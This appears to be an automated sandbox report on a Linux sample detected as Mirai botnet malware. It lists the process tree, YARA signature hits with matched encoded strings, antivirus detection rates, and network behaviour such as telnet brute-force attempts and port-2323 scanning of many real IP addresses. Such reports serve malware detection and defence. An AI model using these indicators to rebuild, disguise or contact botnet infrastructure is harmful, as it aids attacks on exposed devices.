  • systemd New Fork (PID: 5766, Parent: 1)
  • agetty (PID: 5766, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5767, Parent: 1)
  • journalctl (PID: 5767, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5768, Parent: 1)
  • systemd-journald (PID: 5768, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5770, Parent: 1)
  • gdm3 (PID: 5770, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5774, Parent: 5770)
    • plymouth (PID: 5774, Parent: 5770, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 5791, Parent: 5770)
    • gdm-session-worker (PID: 5791, Parent: 5770, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm3 New Fork (PID: 5792, Parent: 5770)
    • Default (PID: 5792, Parent: 5770, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 5793, Parent: 5770)
    • Default (PID: 5793, Parent: 5770, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5775, Parent: 1860)
  • dbus-daemon (PID: 5775, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5776, Parent: 1)
  • accounts-daemon (PID: 5776, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5782, Parent: 5776, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5783, Parent: 5782, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5784, Parent: 5783, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5785, Parent: 5784)
          • locale (PID: 5785, Parent: 5784, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5786, Parent: 5784)
          • grep (PID: 5786, Parent: 5784, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 5789, Parent: 1)
  • whoopsie (PID: 5789, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5790, Parent: 1)
  • journalctl (PID: 5790, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5795, Parent: 1)
  • dbus-daemon (PID: 5795, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5798, Parent: 1)
  • systemd-logind (PID: 5798, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5857, Parent: 1860)
  • pulseaudio (PID: 5857, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5859, Parent: 1)
  • rtkit-daemon (PID: 5859, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5863, Parent: 1)
  • polkitd (PID: 5863, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5870, Parent: 1)
  • gpu-manager (PID: 5870, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5871, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5872, Parent: 5871)
      • grep (PID: 5872, Parent: 5871, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5874, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5875, Parent: 5874)
      • grep (PID: 5875, Parent: 5874, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5879, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5880, Parent: 5879)
      • grep (PID: 5880, Parent: 5879, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5882, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5883, Parent: 5882)
      • grep (PID: 5883, Parent: 5882, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5884, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5885, Parent: 5884)
      • grep (PID: 5885, Parent: 5884, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5887, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5888, Parent: 5887)
      • grep (PID: 5888, Parent: 5887, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5890, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5891, Parent: 5890)
      • grep (PID: 5891, Parent: 5890, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5892, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5893, Parent: 5892)
      • grep (PID: 5893, Parent: 5892, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5873, Parent: 1)
  • rsyslogd (PID: 5873, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5881, Parent: 1)
  • agetty (PID: 5881, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5886, Parent: 1)
  • journalctl (PID: 5886, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5889, Parent: 1)
  • systemd-journald (PID: 5889, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5898, Parent: 1860)
  • dbus-daemon (PID: 5898, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5899, Parent: 1)
  • generate-config (PID: 5899, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5900, Parent: 5899, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5903, Parent: 1)
  • gdm-wait-for-drm (PID: 5903, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5904, Parent: 1)
  • journalctl (PID: 5904, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5907, Parent: 1)
  • whoopsie (PID: 5907, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5914, Parent: 1)
  • systemd-logind (PID: 5914, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5971, Parent: 1)
  • dbus-daemon (PID: 5971, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5974, Parent: 1860)
  • pulseaudio (PID: 5974, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5975, Parent: 1)
  • rtkit-daemon (PID: 5975, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5978, Parent: 1)
  • polkitd (PID: 5978, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5983, Parent: 1)
  • rsyslogd (PID: 5983, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5988, Parent: 1)
  • agetty (PID: 5988, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5991, Parent: 1)
  • journalctl (PID: 5991, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5992, Parent: 1)
  • systemd-journald (PID: 5992, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5993, Parent: 1)
  • gdm3 (PID: 5993, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5996, Parent: 5993)
    • plymouth (PID: 5996, Parent: 5993, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 6011, Parent: 5993)
  • systemd New Fork (PID: 5997, Parent: 1)
  • accounts-daemon (PID: 5997, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 6001, Parent: 5997, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 6002, Parent: 6001, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 6003, Parent: 6002, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 6004, Parent: 6003)
          • locale (PID: 6004, Parent: 6003, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 6005, Parent: 6003)
          • grep (PID: 6005, Parent: 6003, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 6008, Parent: 1)
  • journalctl (PID: 6008, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
01oHMcUgUMSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x11d50:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x11dc0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x11e30:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x11ea0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x11f10:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x12178:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x121cc:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x12220:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x12274:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x122c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
01oHMcUgUMMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
  • 0x10624:$x1: POST /cdn-cgi/
  • 0x11bec:$s1: LCOGQGPTGP
  • 0x117a4:$s4: QWRGPTKQMP
01oHMcUgUMMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
  • 0x10624:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
01oHMcUgUMJoeSecurity_Mirai_5Yara detected MiraiJoe Security
    01oHMcUgUMJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      Click to see the 2 entries

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        5272.1.00000000271eff95.00000000354abf44.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
        • 0x178:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x1cc:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x220:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x274:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x2c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
        5274.1.00000000271eff95.00000000354abf44.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
        • 0x178:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x1cc:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x220:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x274:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x2c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
        5271.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
        • 0x11d50:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x11dc0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x11e30:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x11ea0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x11f10:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x12178:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x121cc:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x12220:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x12274:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x122c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
        5271.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmpMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
        • 0x10624:$x1: POST /cdn-cgi/
        • 0x11bec:$s1: LCOGQGPTGP
        • 0x117a4:$s4: QWRGPTKQMP
        5271.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
        • 0x10624:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
        Click to see the 58 entries

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Multi AV Scanner detection for submitted fileShow sources
        Source: 01oHMcUgUMVirustotal: Detection: 54%Perma Link
        Source: 01oHMcUgUMReversingLabs: Detection: 62%
        Source: /usr/bin/pulseaudio (PID: 5372)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/pkill (PID: 5494)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/pulseaudio (PID: 5635)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/pkill (PID: 5675)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/pulseaudio (PID: 5747)Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pulseaudio (PID: 5857)Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pkill (PID: 5900)Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pulseaudio (PID: 5974)Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: unknownHTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35426 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36624 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36626 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36628 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36630 version: TLS 1.2

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37834
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37834
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37864
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37864
        Source: TrafficSnort IDS: 716 INFO TELNET access 172.108.130.73:23 -> 192.168.2.23:48104
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 172.108.130.73:23 -> 192.168.2.23:48104
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 172.108.130.73:23 -> 192.168.2.23:48104
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37944
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37944
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37978
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37978
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37994
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37994
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:38018
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:38018
        Source: TrafficSnort IDS: 716 INFO TELNET access 172.108.130.73:23 -> 192.168.2.23:48172
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 172.108.130.73:23 -> 192.168.2.23:48172
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 172.108.130.73:23 -> 192.168.2.23:48172
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:38028
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:38028
        Connects to many ports of the same IP (likely port scanning)Show sources
        Source: global trafficTCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
        Uses known network protocols on non-standard portsShow sources
        Source: unknownNetwork traffic detected: HTTP traffic on port 39118 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 60001 -> 39118
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55462
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55464
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55466
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55468
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55470
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55472
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55474
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55476
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55478
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55480
        Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 40918 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 60001 -> 40918
        Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 47938 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 47938 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 47938 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 47938 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 47938 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 47938 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 47938 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 33696 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 33696 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 33696 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 33696 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 33696 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 45494 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 33696 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 35902 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 35902 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 35902 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 33696 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 35902 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 57730 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 33204 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 60001 -> 57730
        Source: unknownNetwork traffic detected: HTTP traffic on port 42450 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 60001 -> 42450
        Source: unknownNetwork traffic detected: HTTP traffic on port 33696 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 47938 -> 60001
        Source: unknownNetwork traffic detected: HTTP traffic on port 33696 -> 60001
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 4.81.245.225:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 135.179.24.145:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 12.164.223.77:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 70.230.240.106:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 67.107.242.196:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 118.97.127.126:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 87.219.161.126:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 168.141.187.3:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 77.233.127.171:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 101.238.32.150:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 87.104.37.64:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 152.70.75.142:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 189.119.225.36:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 162.168.116.77:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 167.158.201.193:2323
        Source: global trafficTCP traffic: 192.168.2.23:48182 -> 104.244.72.234:64938
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 12.89.245.225:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 82.44.132.225:60001
